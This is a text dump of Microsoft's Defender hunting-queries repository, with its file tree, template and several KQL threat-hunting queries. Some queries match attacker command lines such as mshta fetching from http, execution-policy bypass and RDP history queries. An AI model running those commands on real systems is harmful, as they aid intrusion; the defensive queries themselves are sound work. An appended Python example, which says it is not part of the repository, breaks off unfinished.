Repository: microsoft/WindowsDefenderATP-Hunting-Queries
Branch: master
Commit: efa17a600b43
Files: 386
Total size: 5.9 MB
Directory structure:
gitextract_10u3qxy0/
├── .gitignore
├── 00-query-submission-template.md
├── CODE_OF_CONDUCT.md
├── Campaigns/
│ ├── APT Baby Shark.txt
│ ├── APT29 thinktanks.txt
│ ├── Abuse.ch Recent Threat Feed.md
│ ├── Abusing settingcontent-ms.txt
│ ├── Bazacall/
│ │ ├── Bazacall Emails.md
│ │ ├── Cobalt Strike Lateral Movement.md
│ │ ├── Dropping payload via certutil.md
│ │ ├── Excel Macro Execution.md
│ │ ├── Excel file download domain pattern.md
│ │ ├── Malicious Excel Delivery.md
│ │ ├── NTDS theft.md
│ │ ├── Renamed Rclone Exfil.md
│ │ └── RunDLL Suspicious Network Connection.md
│ ├── Bazarloader/
│ │ ├── Stolen Images Execution.md
│ │ ├── Zip-Doc - Creation of JPG Payload File.md
│ │ └── Zip-Doc - Word Launching MSHTA.md
│ ├── Bear Activity GTR 2019.txt
│ ├── Cloud Hopper.txt
│ ├── DofoilNameCoinServerTraffic.txt
│ ├── Dopplepaymer In-Memory Malware Implant.txt
│ ├── Dragon Fly.txt
│ ├── Elise backdoor.txt
│ ├── Equation Group C2 Communication.txt
│ ├── Hurricane Panda activity.txt
│ ├── Judgement Panda exfil activity.txt
│ ├── Jupyter-Solarmaker/
│ │ ├── deimos-component-execution.md
│ │ ├── evasive-powershell-executions.md
│ │ ├── evasive-powershell-strings.md
│ │ └── successive-tk-domain-calls.md
│ ├── LemonDuck/
│ │ ├── LemonDuck-competition-killer.md
│ │ ├── LemonDuck-component-download-structure.md
│ │ ├── LemonDuck-component-names.md
│ │ ├── LemonDuck-control-structure.md
│ │ ├── LemonDuck-defender-exclusions.md
│ │ ├── LemonDuck-email-subjects.md
│ │ ├── LemonDuck-id-generation.md
│ │ └── LemonDuck-registration-function.md
│ ├── Log4J/
│ │ ├── Alerts related to Log4j vulnerability.md
│ │ ├── Devices with Log4j vulnerability alerts and additional other alert related context.md
│ │ ├── Suspicious JScript staging comment.md
│ │ ├── Suspicious PowerShell curl flags.md
│ │ └── Suspicious process event creation from VMWare Horizon TomcatService.md
│ ├── MacOceanLotusBackdoor.txt
│ ├── MacOceanLotusDropper.txt
│ ├── Macaw Ransomware/
│ │ ├── Disable Controlled Folders.md
│ │ ├── Imminent Ransomware.md
│ │ ├── Inhibit recovery by disabling tools and functionality.md
│ │ ├── Mass account password change.md
│ │ ├── PSExec Attrib commands.md
│ │ └── Use of MSBuild as LOLBin.md
│ ├── OceanLotus registry activity.txt
│ ├── Qakbot/
│ │ ├── Excel launching anomalous processes.md
│ │ ├── General attempts to access local email store.md
│ │ ├── Qakbot Craigslist Domains.md
│ │ ├── Qakbot email theft.md
│ │ └── Qakbot reconnaissance activities.md
│ ├── Ransomware hits healthcare - Alternate Data Streams use.txt
│ ├── Ransomware hits healthcare - Backup deletion.txt
│ ├── Ransomware hits healthcare - Cipher.exe tool deleting data.txt
│ ├── Ransomware hits healthcare - Clearing of system logs.txt
│ ├── Ransomware hits healthcare - Possible compromised accounts.txt
│ ├── Ransomware hits healthcare - Robbinhood activity.txt
│ ├── Ransomware hits healthcare - Turning off System Restore.txt
│ ├── Ransomware hits healthcare - Vulnerable Gigabyte drivers.txt
│ ├── StrRAT malware/
│ │ ├── StrRAT-AV-Discovery.md
│ │ ├── StrRAT-Email-Delivery.md
│ │ └── StrRAT-Malware-Persistence.md
│ ├── Sysrv-botnet/
│ │ ├── app-armor-stopped.md
│ │ ├── java-executing-cmd-to-run-powershell.md
│ │ ├── kinsing-miner-download.md
│ │ ├── oracle-webLogic-executing-powershell.md
│ │ ├── rce-on-vulnerable-server.md
│ │ └── tomcat-8-executing-powershell.md
│ ├── Threat actor Phosphorus masquerading as conference organizers.md
│ ├── WastedLocker Downloader.md
│ ├── ZLoader/
│ │ ├── Malicious bat file.md
│ │ ├── Payload Delivery.md
│ │ └── Suspicious Registry Keys.md
│ ├── apt sofacy zebrocy.txt
│ ├── apt sofacy.txt
│ ├── apt ta17 293a ps.txt
│ ├── apt tropictrooper.txt
│ ├── apt unidentified nov 18.txt
│ ├── c2-lookup-from-nonbrowser[Nobelium].md
│ ├── c2-lookup-response[Nobelium].md
│ ├── cobalt-strike-invoked-w-wmi.md
│ ├── compromised-certificate[Nobelium].md
│ ├── confluence-weblogic-targeted.md
│ ├── cypherpunk-exclusive-commands.md
│ ├── cypherpunk-remote-exec-w-psexesvc.md
│ ├── detect-cyzfc-activity.md
│ ├── fireeye-red-team-tools-CVEs [Nobelium].md
│ ├── fireeye-red-team-tools-HASHs [Nobelium].md
│ ├── known-affected-software-orion[Nobelium].md
│ ├── launching-base64-powershell[Nobelium].md
│ ├── launching-cmd-echo[Nobelium].md
│ ├── locate-dll-created-locally[Nobelium].md
│ ├── locate-dll-loaded-in-memory[Nobelium].md
│ ├── oceanlotus-apt32-files.md
│ ├── oceanlotus-apt32-network.md
│ ├── possible-affected-software-orion[Nobelium].md
│ ├── robbinhood-driver.md
│ ├── robbinhood-evasion.md
│ ├── snip3-aviation-targeting-emails.md
│ ├── snip3-detectsanboxie-function-call.md
│ ├── snip3-encoded-powershell-structure.md
│ ├── snip3-malicious-network-connectivity.md
│ └── snip3-revengerat-c2-exfiltration.md
├── Collection/
│ ├── Anomaly of MailItemAccess by Other Users Mailbox [Nobelium].md
│ ├── HostExportingMailboxAndRemovingExport[Solarigate].md
│ └── MailItemsAccessedTimeSeries[Solarigate].md
├── Command and Control/
│ ├── C2-NamedPipe.md
│ ├── Connection to Rare DNS Hosts.md
│ ├── DNSPattern [Nobelium].md
│ ├── Device network events w low count FQDN.txt
│ ├── EncodedDomainURL [Nobelium].md
│ ├── Tor.txt
│ ├── c2-bluekeep.md
│ ├── check-for-shadowhammer-activity-download-domain.md
│ ├── python-use-by-ransomware-macos.md
│ ├── recon-with-rundll.md
│ └── reverse-shell-ransomware-macos.md
├── Credential Access/
│ ├── Active Directory Sensitive Group Modifications.md
│ ├── Private Key Files.txt
│ ├── cobalt-strike.md
│ ├── doppelpaymer-procdump.md
│ ├── identify-accounts-logged-on-to-endpoints-affected-by-cobalt-strike.md
│ ├── lazagne.md
│ ├── logon-attempts-after-malicious-email.md
│ ├── procdump-lsass-credentials.md
│ ├── wadhrama-credential-dump.md
│ └── wdigest-caching.md
├── Defense evasion/
│ ├── ADFSDomainTrustMods[Nobelium].md
│ ├── Discovering potentially tampered devices [Nobelium].md
│ ├── MailPermissionsAddedToApplication[Nobelium].md
│ ├── PotentialMicrosoftDefenderTampering[Solarigate].md
│ ├── UpdateStsRefreshToken[Solorigate].md
│ ├── alt-data-streams.md
│ ├── clear-system-logs.md
│ ├── deleting-data-w-cipher-tool.md
│ ├── doppelpaymer-stop-services.md
│ ├── hiding-java-class-file.md
│ ├── locate-files-possibly-signed-by-fraudulent-ecc-certificates.md
│ ├── qakbot-campaign-process-injection.md
│ └── qakbot-campaign-self-deletion.md
├── Delivery/
│ ├── Doc attachment with link to download.txt
│ ├── Dropbox downloads linked from other site.txt
│ ├── Email link + download + SmartScreen warning.txt
│ ├── Gootkit-malware.md
│ ├── Open email link.txt
│ ├── Pivot from detections to related downloads.txt
│ ├── Qakbot Craigslist Domains.md
│ ├── detect-jscript-file-creation.md
│ └── powercat-download.md
├── Discovery/
│ ├── Detect-Not-Active-AD-User-Accounts.md
│ ├── DetectTorRelayConnectivity.md
│ ├── DetectTorrentUse.txt
│ ├── Discover hosts doing possible network scans.txt
│ ├── Enumeration of users & groups for lateral movement.txt
│ ├── MultipleLdaps.md
│ ├── MultipleSensitiveLdaps.md
│ ├── PasswordSearch.md
│ ├── PrevalentInteractiveLogons
│ ├── Roasting.md
│ ├── SMB shares discovery.txt
│ ├── SensitiveLdaps.md
│ ├── SuspiciousEnumerationUsingAdfind[Nobelium].md
│ ├── URL Detection.txt
│ ├── VulnComputers.md
│ ├── detect-nbtscan-activity.md
│ ├── detect-suspicious-commands-initiated-by-web-server-processes.md
│ ├── doppelpaymer.md
│ ├── qakbot-campaign-esentutl.md
│ └── qakbot-campaign-outlook.md
├── Email Queries/
│ ├── Appspot Phishing Abuse.md
│ ├── JNLP-File-Attachment.md
│ ├── PhishingEmailUrlRedirector.md
│ └── referral-phish-emails.md
├── Execution/
│ ├── Base64 Detector and Decoder.md
│ ├── Base64encodePEFile.txt
│ ├── Detect Encoded Powershell.md
│ ├── Detect PowerShell v2 Downgrade.md
│ ├── ExecuteBase64DecodedPayload.txt
│ ├── File Copy and Execution.md
│ ├── Malware_In_recyclebin.txt
│ ├── Masquerading system executable.txt
│ ├── Possible Ransomware Related Destruction Activity.md
│ ├── PowerShell downloads.txt
│ ├── PowershellCommand - uncommon commands on machine.txt
│ ├── PowershellCommand footprint.txt
│ ├── Webserver Executing Suspicious Applications.md
│ ├── check-for-shadowhammer-activity-implant.md
│ ├── detect-anomalous-process-trees.md
│ ├── detect-bluekeep-related-mining.md
│ ├── detect-doublepulsar-execution.md
│ ├── detect-exploitation-of-cve-2018-8653.md
│ ├── detect-malcious-use-of-msiexec.md
│ ├── detect-malicious-rar-extraction.md
│ ├── detect-office-products-spawning-wmic.md
│ ├── detect-suspicious-mshta-usage.md
│ ├── detect-web-server-exploit-doublepulsar.md
│ ├── exchange-iis-worker-dropping-webshell.md
│ ├── jse-launched-by-word.md
│ ├── launch-questd-w-osascript.md
│ ├── locate-shlayer-payload-decryption-activity.md
│ ├── locate-shlayer-payload-decrytion-activity.md
│ ├── locate-surfbuyer-downloader-decoding-activity.md
│ ├── office-apps-launching-wscipt.md
│ ├── powershell-activity-after-email-from-malicious-sender.md
│ ├── powershell-version-2.0-execution.md
│ ├── python-based-attacks-on-macos.md
│ ├── qakbot-campaign-suspicious-javascript.md
│ ├── reverse-shell-nishang-base64.md
│ ├── reverse-shell-nishang.md
│ ├── sql-server-abuse.md
│ ├── umworkerprocess-creating-webshell.md
│ └── umworkerprocess-unusual-subprocess-activity.md
├── Exfiltration/
│ ├── 7-zip-prep-for-exfiltration.md
│ ├── Anomaly of MailItemAccess by GraphAPI [Nobelium].md
│ ├── Data copied to other location than C drive.txt
│ ├── Files copied to USB drives.md
│ ├── MailItemsAccessed Throttling [Nobelium].md
│ ├── Map external devices.txt
│ ├── OAuth Apps accessing user mail via GraphAPI [Nobelium].md
│ ├── OAuth Apps reading mail both via GraphAPI and directly [Nobelium].md
│ ├── OAuth Apps reading mail via GraphAPI anomaly [Nobelium].md
│ ├── Password Protected Archive Creation.md
│ ├── Possible File Copy to USB Drive.md
│ ├── detect-archive-exfiltration-to-competitor.md
│ ├── detect-exfiltration-after-termination.md
│ ├── detect-steganography-exfiltration.md
│ └── exchange-powershell-snapin-loaded.md
├── Exploits/
│ ├── AcroRd-Exploits.txt
│ ├── CVE-2021-36934 usage detection.md
│ ├── Electron-CVE-2018-1000006.txt
│ ├── Flash-CVE-2018-4848.txt
│ ├── Linux-DynoRoot-CVE-2018-1111.txt
│ ├── MosaicLoader.md
│ ├── Print Spooler RCE/
│ │ ├── Spoolsv Spawning Rundll32.md
│ │ ├── Suspicious DLLs in spool folder.md
│ │ ├── Suspicious Spoolsv Child Process.md
│ │ └── Suspicious files in spool folder.md
│ ├── SolarWinds -CVE-2021-35211.md
│ ├── printnightmare-cve-2021-1675 usage detection.md
│ ├── winrar-cve-2018-20250-ace-files.md
│ └── winrar-cve-2018-20250-file-creation.md
├── Fun/
│ ├── EmojiHunt.txt
│ ├── HiddenMessage.txt
│ └── Make FolderPath Vogon Poetry.md
├── General queries/
│ ├── Alert Events from Internal IP Address.txt
│ ├── AppLocker Policy Design Assistant.md
│ ├── Baseline Comparison.txt
│ ├── Crashing Applications.md
│ ├── Detect Azure RemoteIP.md
│ ├── Device Count by DNS Suffix.md
│ ├── Device uptime calculation.md
│ ├── Endpoint Agent Health Status Report.md
│ ├── Events surrounding alert.txt
│ ├── Failed Logon Attempt.txt
│ ├── File footprint.txt
│ ├── Firewall Policy Design Assistant.md
│ ├── MD AV Signature and Platform Version.md
│ ├── MITRE - Suspicious Events.txt
│ ├── Machine info from IP address.txt
│ ├── Network footprint.txt
│ ├── Network info of machine.txt
│ ├── Phish and Malware received by user vs total amount of email.md
│ ├── Services.txt
│ ├── System Guard Security Level Baseline.txt
│ ├── System Guard Security Level Drop.txt
│ ├── insider-threat-detection-queries.md
│ └── wifikeys.txt
├── Impact/
│ ├── backup-deletion.md
│ ├── ransom-note-creation-macos.md
│ ├── turn-off-system-restore.md
│ └── wadhrama-data-destruction.md
├── Initial access/
│ ├── Check for Maalware Baazar (abuse.ch) hashes in your mail flow.md
│ ├── Non_intended_user_logon.md
│ ├── PhishingEmailUrlRedirector.md
│ ├── SuspiciousUrlClicked.md
│ ├── WhenZAPed.md
│ ├── detect-bluekeep-exploitation-attempts.md
│ ├── detect-mailsniper.md
│ ├── files-from-malicious-sender.md
│ ├── identify-potential-missed-phishing-email-campaigns.md
│ └── jar-attachments.md
├── LICENSE
├── Lateral Movement/
│ ├── Account brute force.txt
│ ├── Device Logons from Unknown IPs.txt
│ ├── ImpersonatedUserFootprint.md
│ ├── Network Logons with Local Accounts.md
│ ├── Non-local logons with -500 account.txt
│ ├── ServiceAccountsPerformingRemotePS.txt
│ ├── detect-suspicious-rdp-connections.md
│ ├── doppelpaymer-psexec.md
│ └── remote-file-creation-with-psexec.md
├── M365-PowerBi Dashboard/
│ ├── Microsoft Threat Protection - API Dashboard.pbit
│ └── readme.txt
├── Network/
│ └── Defender for Endpoint Telemetry.txt
├── Notebooks/
│ ├── M365D APIs ep3.ipynb
│ ├── WDATP APIs Demo Notebook.ipynb
│ └── mtp_hunting.ipynb
├── Persistence/
│ ├── Accessibility Features.txt
│ ├── AddedCredentialFromContryXAndSigninFromCountryY.md
│ ├── Create account.txt
│ ├── CredentialsAddAfterAdminConsentedToApp[Nobelium].md
│ ├── LocalAdminGroupChanges.txt
│ ├── NewAppOrServicePrincipalCredential[Nobelium].md
│ ├── Possible webshell drop.md
│ ├── detect-prifou-pua.md
│ ├── localAdminAccountLogon.txt
│ ├── qakbot-campaign-registry-edit.md
│ ├── scheduled task creation.txt
│ └── wadhrama-ransomware.md
├── Privilege escalation/
│ ├── Add uncommon credential type to application [Nobelium].md
│ ├── SAM-Name-Changes-CVE-2021-42278.md
│ ├── ServicePrincipalAddedToRole [Nobelium].md
│ ├── cve-2019-0808-c2.md
│ ├── cve-2019-0808-nufsys-file creation.md
│ ├── cve-2019-0808-set-scheduled-task.md
│ ├── dell-driver-vulnerability-2021.md
│ ├── detect-cve-2019-0863-AngryPolarBearBug2-exploit.md
│ ├── detect-cve-2019-0973-installerbypass-exploit.md
│ ├── detect-cve-2019-1053-sandboxescape-exploit.md
│ ├── detect-cve-2019-1069-bearlpe-exploit.md
│ ├── detect-cve-2019-1129-byebear-exploit.md
│ └── locate-ALPC-local-privilege-elevation-exploit.md
├── Protection events/
│ ├── AV Detections with Source.txt
│ ├── AV Detections with USB Disk Drive.txt
│ ├── Antivirus detections.txt
│ ├── ExploitGuardASRStats.txt
│ ├── ExploitGuardAsrDescriptions.txt
│ ├── ExploitGuardBlockOfficeChildProcess.txt
│ ├── ExploitGuardControlledFolderAccess.txt
│ ├── ExploitGuardNetworkProtectionEvents.txt
│ ├── ExploitGuardStats.txt
│ ├── PUA ThreatName per Computer.txt
│ ├── README.md
│ ├── SmartScreen URL block ignored by user.txt
│ ├── SmartScreen app block ignored by user.txt
│ ├── Windows filtering events (Firewall).txt
│ └── WindowsDefenderAVEvents.txt
├── README.md
├── Ransomware/
│ ├── Backup deletion.md
│ ├── Check for multiple signs of ransomware activity.md
│ ├── Clearing of forensic evidence from event logs using wevtutil.md
│ ├── DarkSide.md
│ ├── Deletion of data on multiple drives using cipher exe.md
│ ├── Discovery for highly-privileged accounts.md
│ ├── Distribution from remote location.md
│ ├── Fake Replies.md
│ ├── File Backup Deletion Alerts.md
│ ├── Gootkit File Delivery.md
│ ├── HTA Startup Persistence.md
│ ├── IcedId Delivery.md
│ ├── IcedId attachments.md
│ ├── IcedId email delivery.md
│ ├── LaZagne Credential Theft.md
│ ├── Potential ransomware activity related to Cobalt Strike.md
│ ├── Qakbot discovery activies.md
│ ├── Sticky Keys.md
│ ├── Stopping multiple processes using taskkill.md
│ ├── Stopping processes using net stop.md
│ ├── Suspicious Bitlocker Encryption.md
│ ├── Suspicious Google Doc Links.md
│ ├── Suspicious Image Load related to IcedId.md
│ ├── Turning off System Restore.md
│ └── Turning off services using sc exe.md
├── SECURITY.md
├── TVM/
│ └── devices_with_vuln_and_users_received_payload.md
├── Troubleshooting/
│ ├── Connectivity Failures by Device.md
│ └── Connectivity Failures by Domain.md
└── Webcasts/
├── Airlift 2021 - Lets Invoke.csl
├── Ignite 2020 - Best practices for hunting across domains with Microsoft 365 Defender.txt
├── README.md
├── TrackingTheAdversary/
│ ├── Episode 1 - KQL Fundamentals.txt
│ ├── Episode 2 - Joins.txt
│ ├── Episode 3 - Summarizing, Pivoting, and Joining.txt
│ ├── Episode 4 - Lets Hunt.txt
│ └── README.md
└── l33tSpeak/
├── MCAS - The Hunt.txt
├── Performance, Json and dynamics operator, external data.txt
└── l33tspeak 11 Oct 2021 - externaldata and query partitioning.csl
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitignore
================================================
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
##
## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
# User-specific files
*.suo
*.user
*.userosscache
*.sln.docstates
# User-specific files (MonoDevelop/Xamarin Studio)
*.userprefs
# Build results
[Dd]ebug/
[Dd]ebugPublic/
[Rr]elease/
[Rr]eleases/
x64/
x86/
bld/
[Bb]in/
[Oo]bj/
[Ll]og/
# Visual Studio 2015 cache/options directory
.vs/
# Uncomment if you have tasks that create the project's static files in wwwroot
#wwwroot/
# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*
# NUNIT
*.VisualState.xml
TestResult.xml
# Build Results of an ATL Project
[Dd]ebugPS/
[Rr]eleasePS/
dlldata.c
# .NET Core
project.lock.json
project.fragment.lock.json
artifacts/
**/Properties/launchSettings.json
*_i.c
*_p.c
*_i.h
*.ilk
*.meta
*.obj
*.pch
*.pdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*.log
*.vspscc
*.vssscc
.builds
*.pidb
*.svclog
*.scc
# Chutzpah Test files
_Chutzpah*
# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opendb
*.opensdf
*.sdf
*.cachefile
*.VC.db
*.VC.VC.opendb
# Visual Studio profiler
*.psess
*.vsp
*.vspx
*.sap
# TFS 2012 Local Workspace
$tf/
# Guidance Automation Toolkit
*.gpState
# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
*.DotSettings.user
# JustCode is a .NET coding add-in
.JustCode
# TeamCity is a build add-in
_TeamCity*
# DotCover is a Code Coverage Tool
*.dotCover
# Visual Studio code coverage results
*.coverage
*.coveragexml
# NCrunch
_NCrunch_*
.*crunch*.local.xml
nCrunchTemp_*
# MightyMoose
*.mm.*
AutoTest.Net/
# Web workbench (sass)
.sass-cache/
# Installshield output folder
[Ee]xpress/
# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html
# Click-Once directory
publish/
# Publish Web Output
*.[Pp]ublish.xml
*.azurePubxml
# TODO: Comment the next line if you want to checkin your web deploy settings
# but database connection strings (with potential passwords) will be unencrypted
*.pubxml
*.publishproj
# Microsoft Azure Web App publish settings. Comment the next line if you want to
# checkin your Azure Web App publish settings, but sensitive information contained
# in these scripts will be unencrypted
PublishScripts/
# NuGet Packages
*.nupkg
# The packages folder can be ignored because of Package Restore
**/packages/*
# except build/, which is used as an MSBuild target.
!**/packages/build/
# Uncomment if necessary however generally it will be regenerated when needed
#!**/packages/repositories.config
# NuGet v3's project.json files produces more ignorable files
*.nuget.props
*.nuget.targets
# Microsoft Azure Build Output
csx/
*.build.csdef
# Microsoft Azure Emulator
ecf/
rcf/
# Windows Store app package directories and files
AppPackages/
BundleArtifacts/
Package.StoreAssociation.xml
_pkginfo.txt
# Visual Studio cache files
# files ending in .cache can be ignored
*.[Cc]ache
# but keep track of directories ending in .cache
!*.[Cc]ache/
# Others
ClientBin/
~$*
*~
*.dbmdl
*.dbproj.schemaview
*.jfm
*.pfx
*.publishsettings
orleans.codegen.cs
# Since there are multiple workflows, uncomment next line to ignore bower_components
# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
#bower_components/
# RIA/Silverlight projects
Generated_Code/
# Backup & report files from converting an old project file
# to a newer Visual Studio version. Backup files are not needed,
# because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
# SQL Server files
*.mdf
*.ldf
*.ndf
# Business Intelligence projects
*.rdl.data
*.bim.layout
*.bim_*.settings
# Microsoft Fakes
FakesAssemblies/
# GhostDoc plugin setting file
*.GhostDoc.xml
# Node.js Tools for Visual Studio
.ntvs_analysis.dat
node_modules/
# Typescript v1 declaration files
typings/
# Visual Studio 6 build log
*.plg
# Visual Studio 6 workspace options file
*.opt
# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
*.vbw
# Visual Studio LightSwitch build output
**/*.HTMLClient/GeneratedArtifacts
**/*.DesktopClient/GeneratedArtifacts
**/*.DesktopClient/ModelManifest.xml
**/*.Server/GeneratedArtifacts
**/*.Server/ModelManifest.xml
_Pvt_Extensions
# Paket dependency manager
.paket/paket.exe
paket-files/
# FAKE - F# Make
.fake/
# JetBrains Rider
.idea/
*.sln.iml
# CodeRush
.cr/
# Python Tools for Visual Studio (PTVS)
__pycache__/
*.pyc
# Cake - Uncomment if you are using it
# tools/**
# !tools/packages.config
# Telerik's JustMock configuration file
*.jmconfig
# BizTalk build output
*.btp.cs
*.btm.cs
*.odx.cs
*.xsd.cs
================================================
FILE: 00-query-submission-template.md
================================================
# < Insert query name >
< Provide query description and usage tips >
## Query
```
< Insert query string here >
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |
## Contributor info
**Contributor:** < your name >
**GitHub alias:** < your github alias >
**Organization:** < your org >
**Contact info:** < email or website >
================================================
FILE: CODE_OF_CONDUCT.md
================================================
# Microsoft Open Source Code of Conduct
This project has adopted the [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/).
Resources:
- [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/)
- [Microsoft Code of Conduct FAQ](https://opensource.microsoft.com/codeofconduct/faq/)
- Contact [opencode@microsoft.com](mailto:opencode@microsoft.com) with questions or concerns
================================================
FILE: Campaigns/APT Baby Shark.txt
================================================
// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_babyshark.yml
// Questions via Twitter: @janvonkirchheim
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine =~ @"reg query ""HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default"""
or ProcessCommandLine startswith "powershell.exe mshta.exe http"
or ProcessCommandLine =~ "cmd.exe /c taskkill /im cmd.exe"
| top 100 by Timestamp desc
================================================
FILE: Campaigns/APT29 thinktanks.txt
================================================
// Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_apt29_thinktanks.yml
// Questions via Twitter: @janvonkirchheim
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine has "-noni -ep bypass $"
| top 100 by Timestamp desc
================================================
FILE: Campaigns/Abuse.ch Recent Threat Feed.md
================================================
# Abuse.ch Recent Threat Feed
This query hunts for files matching the current abuse.ch (MalwareBazaar) recent threat feed by SHA256. By default it analyzes the last day's worth of events; the lookback is configurable through the MaxAge variable.
## Query
```
let MaxAge = ago(1d);
let AbuseFeed = materialize (
(externaldata(report:string)
[@"https://bazaar.abuse.ch/export/csv/recent/"]
with (format = "txt"))
| where report !startswith '#'
| extend report = parse_csv(report)
| extend FirstSeenUtc = tostring(report[0])
| project FirstSeenUtc = todatetime(FirstSeenUtc)
,SHA256 = trim('[ "]+',tostring(report[1]))
, MD5 = trim('[ "]+',tostring(report[2]))
, SHA1 = trim('[ "]+',tostring(report[3]))
, Reporter = trim('[ "]+',tostring(report[4]))
, FileName = trim('[ "]+',tostring(report[5]))
, FileType = trim('[ "]+',tostring(report[6]))
, MimeType = trim('[ "]+',tostring(report[7]))
, Signer = iff(report[8] == 'n/a', '', trim('[ "]+',tostring(report[8])))
, ClamAV = iff(report[9] == 'n/a', '', trim('[ "]+',tostring(report[9])))
, VTPercent = iff(report[10] == 'n/a', 0.0, todouble(report[10]))
, ImpHash = iff(report[11] == 'n/a', '', trim('[ "]+',tostring(report[11])))
, SSDeep = iff(report[12] == 'n/a', '', trim('[ "]+',tostring(report[12])))
, TLSH = iff(report[13] == 'n/a', '', trim('[ "]+',tostring(report[13])))
);
union (
AbuseFeed
| join (
DeviceProcessEvents
| where Timestamp > MaxAge
) on SHA256
), (
AbuseFeed
| join (
DeviceFileEvents
| where Timestamp > MaxAge
) on SHA256
), (
AbuseFeed
| join (
DeviceImageLoadEvents
| where Timestamp > MaxAge
) on SHA256
)
```
...or if you don't care about the details from Malware Bazaar you might consider this slightly more lightweight version
```
let MaxAge = ago(1d);
let AbuseFeed = toscalar (
(externaldata(report:string)
[@"https://bazaar.abuse.ch/export/txt/sha256/recent/"]
with (format = "txt"))
| where report !startswith '#'
| summarize make_set(report)
);
union (
DeviceProcessEvents
| where Timestamp > MaxAge and SHA256 in (AbuseFeed)
), (
DeviceFileEvents
| where Timestamp > MaxAge and SHA256 in (AbuseFeed)
), (
DeviceImageLoadEvents
| where Timestamp > MaxAge and SHA256 in (AbuseFeed)
)
```
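The feed parsing and hash join above, as an added offline example that is not part of the repository: it parses a constructed sample in the layout of the MalwareBazaar CSV export (comment lines, a leading space and quotes around every field after the first, `n/a` placeholders), normalises the fields the way the KQL projection does, and joins the hashes against constructed rows from the three device tables the query unions. The `n/a` comparison is done after trimming, so it behaves the same whether or not the CSV parser has already removed the quotes. All hashes, device names and timestamps are made up.

```python
"""Offline model of the abuse.ch feed hunt: parse the export, then join on SHA256
against DeviceProcessEvents / DeviceFileEvents / DeviceImageLoadEvents rows.
Added example, not repository code; all sample data below is constructed."""
import csv
import io
import re
from datetime import datetime, timedelta, timezone

# Same character class as the KQL trim('[ "]+', ...).
TRIM = re.compile(r'^[ "]+|[ "]+$')


def clean(field):
    """Strip surrounding spaces/quotes, then map the feed's 'n/a' to ''.
    Comparing after trimming keeps this correct whether or not the parser
    already removed the quotes."""
    value = TRIM.sub("", field)
    return "" if value == "n/a" else value


def parse_feed(text):
    """Parse the export into records keyed like the KQL projection
    (report[0] .. report[13]); '#' comment lines are skipped."""
    records = []
    for row in csv.reader(io.StringIO(text)):
        if not row or row[0].startswith("#"):
            continue
        f = [clean(c) for c in row]
        records.append({
            "FirstSeenUtc": datetime.strptime(f[0], "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc),
            "SHA256": f[1].lower(), "MD5": f[2], "SHA1": f[3], "Reporter": f[4],
            "FileName": f[5], "FileType": f[6], "MimeType": f[7], "Signer": f[8],
            "ClamAV": f[9], "VTPercent": float(f[10]) if f[10] else 0.0,
            "ImpHash": f[11], "SSDeep": f[12], "TLSH": f[13],
        })
    return records


def hunt(feed, events, max_age, now):
    """Union of feed JOIN each device table on SHA256, keeping only rows with
    Timestamp > now - max_age (the KQL MaxAge filter). Hashes are lower-cased
    on both sides as a safeguard; the KQL join itself is case-sensitive."""
    by_hash = {r["SHA256"]: r for r in feed}
    hits = []
    for table, rows in events.items():
        for ev in rows:
            if ev["Timestamp"] <= now - max_age:
                continue
            match = by_hash.get(ev["SHA256"].lower())
            if match:
                hits.append({"Table": table, "DeviceName": ev["DeviceName"],
                             "FileName": ev["FileName"], "SHA256": match["SHA256"],
                             "Reporter": match["Reporter"], "ClamAV": match["ClamAV"],
                             "VTPercent": match["VTPercent"]})
    return hits


# Constructed sample feed (not real abuse.ch data) in the export's layout.
H_A, H_B, H_C = "a" * 64, "b" * 64, "c" * 64
MD5_1, SHA1_1, MD5_2, SHA1_2 = "1" * 32, "2" * 40, "3" * 32, "4" * 40
SAMPLE_FEED = f'''# MalwareBazaar recent samples (constructed for this example)
# first_seen_utc,sha256_hash,md5_hash,sha1_hash,reporter,file_name,file_type_guess,mime_type,signature,clamav,vtpercent,imphash,ssdeep,tlsh
"2021-06-01 10:15:00", "{H_A}", "{MD5_1}", "{SHA1_1}", "reporter1", "invoice.exe", "exe", "application/x-dosexec", "n/a", "Win.Trojan.Generic", "55.00", "n/a", "n/a", "n/a"
"2021-06-01 09:00:00", "{H_B}", "{MD5_2}", "{SHA1_2}", "reporter2", "loader.dll", "dll", "application/x-dosexec", "n/a", "n/a", "n/a", "n/a", "n/a", "n/a"
'''

NOW = datetime(2021, 6, 2, 12, 0, tzinfo=timezone.utc)
SAMPLE_EVENTS = {  # constructed device telemetry
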